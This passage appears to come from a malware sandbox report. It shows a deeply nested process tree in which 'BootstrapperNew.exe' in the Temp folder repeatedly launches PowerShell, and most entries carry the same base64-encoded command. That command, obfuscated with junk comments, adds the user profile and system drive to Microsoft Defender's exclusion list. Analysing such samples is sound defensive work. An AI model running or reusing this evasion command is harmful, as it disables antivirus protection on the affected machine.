        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        229⤵
        
        PID:6328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        229⤵
        Checks computer location settings
        
        PID:5920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        230⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        230⤵
        Checks computer location settings
        
        PID:6756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        231⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        231⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        232⤵
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        232⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        233⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        233⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        234⤵
        System Location Discovery: System Language Discovery
        
        PID:6404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        235⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        234⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        235⤵
        System Location Discovery: System Language Discovery
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        235⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        236⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        236⤵
        
        PID:4052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        237⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        237⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        238⤵
        System Location Discovery: System Language Discovery
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        238⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        239⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        239⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        240⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        240⤵
        Checks computer location settings
        
        PID:224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        241⤵
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        241⤵
        Drops file in Windows directory
        
        PID:752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        242⤵
        
        PID:7400
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        242⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        243⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        243⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        244⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        244⤵
        Drops file in Windows directory
        
        PID:8028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        245⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        245⤵
        
        PID:8152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        246⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        246⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        247⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        247⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        248⤵
        
        PID:1912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        249⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        248⤵
        
        PID:404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        249⤵
        
        PID:3024
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        250⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        249⤵
        Checks computer location settings
        
        PID:7004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        250⤵
        System Location Discovery: System Language Discovery
        
        PID:7292
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        250⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        251⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        251⤵
        Checks computer location settings
        
        PID:7176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        252⤵
        
        PID:7676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        252⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        253⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        253⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        254⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        254⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        255⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        255⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        256⤵
        
        PID:7796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        257⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        256⤵
        System Location Discovery: System Language Discovery
        
        PID:396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        257⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        257⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        258⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        258⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        259⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        259⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
